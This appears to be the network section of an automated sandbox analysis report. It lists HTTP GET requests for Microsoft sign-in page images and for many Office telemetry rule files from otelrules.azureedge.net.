          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
